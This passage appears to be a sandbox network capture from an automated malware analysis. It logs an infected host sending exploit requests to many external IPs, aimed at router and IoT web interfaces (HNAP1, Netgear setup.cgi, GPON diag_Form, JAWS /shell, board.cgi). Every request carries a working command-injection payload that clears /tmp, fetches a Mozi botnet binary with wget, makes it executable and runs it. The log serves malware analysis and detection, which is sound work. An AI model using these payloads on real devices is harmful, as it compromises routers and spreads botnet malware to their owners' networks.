                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Jan 6, 2021 14:59:53.613742113 CET | 826 | IN | HTTP/1.0 404 Not Found
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Referrer-Policy: no-referrer
                                                                                                        Content-Length: 1567
                                                                                                        Date: Wed, 06 Jan 2021 13:59:53 GMT
                                                                                                        Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/


Session ID | Source IP | Source Port | Destination IP | Destination Port
23 | 192.168.2.20 | 51602 | 104.98.58.115 | 80
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 14:59:54.046506882 CET | 827 | OUT | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                        User-Agent: Hello, world
                                                                                                        Host: 104.98.58.115:80
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                        Connection: keep-alive
Jan 6, 2021 14:59:54.195096016 CET | 828 | IN | HTTP/1.0 400 Bad Request
                                                                                                        Server: AkamaiGHost
                                                                                                        Mime-Version: 1.0
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 207
                                                                                                        Expires: Wed, 06 Jan 2021 13:59:54 GMT
                                                                                                        Date: Wed, 06 Jan 2021 13:59:54 GMT
                                                                                                        Connection: close
                                                                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;ff86668&#46;1609941594&#46;3b7ca71</BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port
24 | 192.168.2.20 | 47394 | 15.206.172.134 | 80
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 15:00:04.011616945 CET | 873 | OUT | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Jan 6, 2021 15:00:04.168989897 CET | 873 | IN | HTTP/1.1 302 Found
                                                                                                        Date: Wed, 06 Jan 2021 14:00:04 GMT
                                                                                                        Server: Apache
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Location: https://www.vavodigital.com/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                                                                                                        Content-Length: 383
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.vavodigital.com/setup.cgi?next_file=netgear.cfg&amp;todo=syscmd&amp;cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&amp;curpath=/&amp;currentsetting.htm=1">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
25 | 192.168.2.20 | 60196 | 23.218.46.16 | 80
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 15:00:22.368252039 CET | 960 | OUT | POST /HNAP1/ HTTP/1.0
                                                                                                        Host: 23.218.46.16:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Jan 6, 2021 15:00:22.660655022 CET | 962 | IN | HTTP/1.0 400 Bad Request
                                                                                                        Server: AkamaiGHost
                                                                                                        Mime-Version: 1.0
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 250
                                                                                                        Expires: Wed, 06 Jan 2021 14:00:22 GMT
                                                                                                        Date: Wed, 06 Jan 2021 14:00:22 GMT
                                                                                                        Connection: close
                                                                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;HNAP1&#47;", is invalid.<p>Reference&#32;&#35;9&#46;b736d417&#46;1609941622&#46;267b50e0</BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port
26 | 192.168.2.20 | 35670 | 43.242.34.224 | 8080
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 15:00:23.789465904 CET | 971 | OUT | GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
Data Raw:
Data Ascii:
Jan 6, 2021 15:00:24.338797092 CET | 971 | OUT | GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
Data Raw:
Data Ascii:
Jan 6, 2021 15:00:25.042809010 CET | 975 | OUT | GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
Data Raw:
Data Ascii:
Jan 6, 2021 15:00:26.454811096 CET | 977 | OUT | GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
Data Raw:
Data Ascii:
Jan 6, 2021 15:00:29.274982929 CET | 993 | OUT | GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
Data Raw:
Data Ascii:
Jan 6, 2021 15:00:34.923228025 CET | 1019 | OUT | GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
Data Raw:
Data Ascii:
Jan 6, 2021 15:00:46.219926119 CET | 1073 | OUT | GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
Data Raw:
Data Ascii:
Jan 6, 2021 15:01:08.812869072 CET | 1180 | OUT | GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
Data Raw:
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port
27 | 192.168.2.20 | 60130 | 99.61.64.177 | 8080
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 15:00:34.743587017 CET | 1018 | OUT | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Jan 6, 2021 15:00:34.939941883 CET | 1019 | IN | HTTP/1.0 404 Not Found
                                                                                                        Date: Wed, 06 Jan 2021 08:19:15 GMT
                                                                                                        Server: DNVRS-Webs
                                                                                                        Cache-Control: no-cache
                                                                                                        Content-Length: 166
                                                                                                        Content-Type: text/html
                                                                                                        Connection: close
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
28 | 192.168.2.20 | 34026 | 206.212.1.199 | 80
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 15:01:02.713958025 CET | 1150 | OUT | POST /HNAP1/ HTTP/1.0
                                                                                                        Host: 206.212.1.199:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Jan 6, 2021 15:01:03.164597034 CET | 1152 | OUT | POST /HNAP1/ HTTP/1.0
                                                                                                        Host: 206.212.1.199:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Jan 6, 2021 15:01:03.668601990 CET | 1159 | OUT | POST /HNAP1/ HTTP/1.0
                                                                                                        Host: 206.212.1.199:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Jan 6, 2021 15:01:04.676696062 CET | 1162 | OUT | POST /HNAP1/ HTTP/1.0
                                                                                                        Host: 206.212.1.199:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Jan 6, 2021 15:01:06.696851969 CET | 1175 | OUT | POST /HNAP1/ HTTP/1.0
                                                                                                        Host: 206.212.1.199:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Jan 6, 2021 15:01:10.732965946 CET | 1198 | OUT | POST /HNAP1/ HTTP/1.0
                                                                                                        Host: 206.212.1.199:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Jan 6, 2021 15:01:18.813317060 CET | 1243 | OUT | POST /HNAP1/ HTTP/1.0
                                                                                                        Host: 206.212.1.199:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Jan 6, 2021 15:01:34.990187883 CET | 1329 | OUT | POST /HNAP1/ HTTP/1.0
                                                                                                        Host: 206.212.1.199:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


Session ID | Source IP | Source Port | Destination IP | Destination Port
29 | 192.168.2.20 | 44974 | 192.155.170.244 | 80
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 15:01:09.756969929 CET | 1189 | OUT | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                        User-Agent: Hello, world
                                                                                                        Host: 192.155.170.244:80
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                        Connection: keep-alive
Jan 6, 2021 15:01:09.980545044 CET | 1190 | IN | HTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Jan 2021 14:01:09 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 146
                                                                                                        Connection: keep-alive
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
3 | 192.168.2.20 | 59680 | 115.15.161.14 | 8080
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 14:57:53.818731070 CET | 214 | OUT | POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:8080
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0
Jan 6, 2021 14:57:54.091607094 CET | 214 | IN | HTTP/1.1 404 Not Found
                                                                                                        Content-Type: text/plain
                                                                                                        Content-Length: 30
                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
30 | 192.168.2.20 | 51890 | 190.114.190.228 | 8080
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 15:01:09.920361042 CET | 1190 | OUT | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Jan 6, 2021 15:01:10.669035912 CET | 1197 | OUT | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Jan 6, 2021 15:01:11.769078970 CET | 1201 | OUT | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Jan 6, 2021 15:01:13.965116024 CET | 1220 | OUT | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Jan 6, 2021 15:01:18.365367889 CET | 1240 | OUT | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Jan 6, 2021 15:01:27.149779081 CET | 1292 | OUT | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


Session ID | Source IP | Source Port | Destination IP | Destination Port
31 | 192.168.2.20 | 57262 | 51.178.69.101 | 80
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 15:01:16.609090090 CET | 1233 | OUT | POST /HNAP1/ HTTP/1.0
                                                                                                        Host: 51.178.69.101:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Jan 6, 2021 15:01:16.665462971 CET | 1233 | IN | HTTP/1.1 426 Upgrade Required
                                                                                                        date: Wed, 06 Jan 2021 14:01:16 GMT
                                                                                                        server: istio-envoy
                                                                                                        connection: close
                                                                                                        content-length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
32 | 192.168.2.20 | 53236 | 66.201.89.13 | 80
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 15:01:23.721649885 CET | 1267 | OUT | POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                        Host: 127.0.0.1:80
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        Accept: */*
                                                                                                        User-Agent: Hello, World
                                                                                                        Content-Length: 118
                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
Jan 6, 2021 15:01:23.877624989 CET | 1269 | IN | HTTP/1.1 404 Not Found
                                                                                                        Cache-Control: private
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                        X-Powered-By: ASP.NET
                                                                                                        Date: Wed, 06 Jan 2021 14:01:22 GMT
                                                                                                        Content-Length: 4887
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#h
Jan 6, 2021 15:01:24.033241034 CET | 1275 | IN | HTTP/1.1 400 Bad Request
                                                                                                        Content-Type: text/html; charset=us-ascii
                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                        Date: Wed, 06 Jan 2021 14:01:22 GMT
                                                                                                        Connection: close
                                                                                                        Content-Length: 326
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid Verb</h2><hr><p>HTTP Error 400. The request verb is invalid.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port
33 | 192.168.2.20 | 53646 | 184.31.173.81 | 80
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 15:01:23.725990057 CET | 1268 | OUT | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                        User-Agent: Hello, world
                                                                                                        Host: 184.31.173.81:80
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                        Connection: keep-alive
Jan 6, 2021 15:01:23.922187090 CET | 1274 | IN | HTTP/1.0 400 Bad Request
                                                                                                        Server: AkamaiGHost
                                                                                                        Mime-Version: 1.0
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 209
                                                                                                        Expires: Wed, 06 Jan 2021 14:01:23 GMT
                                                                                                        Date: Wed, 06 Jan 2021 14:01:23 GMT
                                                                                                        Connection: close
                                                                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;2418ae8c&#46;1609941683&#46;b70edbf1</BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port
34 | 192.168.2.20 | 55652 | 38.87.83.34 | 80
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 15:01:30.654612064 CET | 1308 | OUT | POST /HNAP1/ HTTP/1.0
                                                                                                        Host: 38.87.83.34:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


Session ID | Source IP | Source Port | Destination IP | Destination Port
35 | 192.168.2.20 | 46816 | 23.218.148.138 | 80
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 15:01:37.647290945 CET | 1341 | OUT | POST /HNAP1/ HTTP/1.0
                                                                                                        Host: 23.218.148.138:80
                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                        Content-Length: 640
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
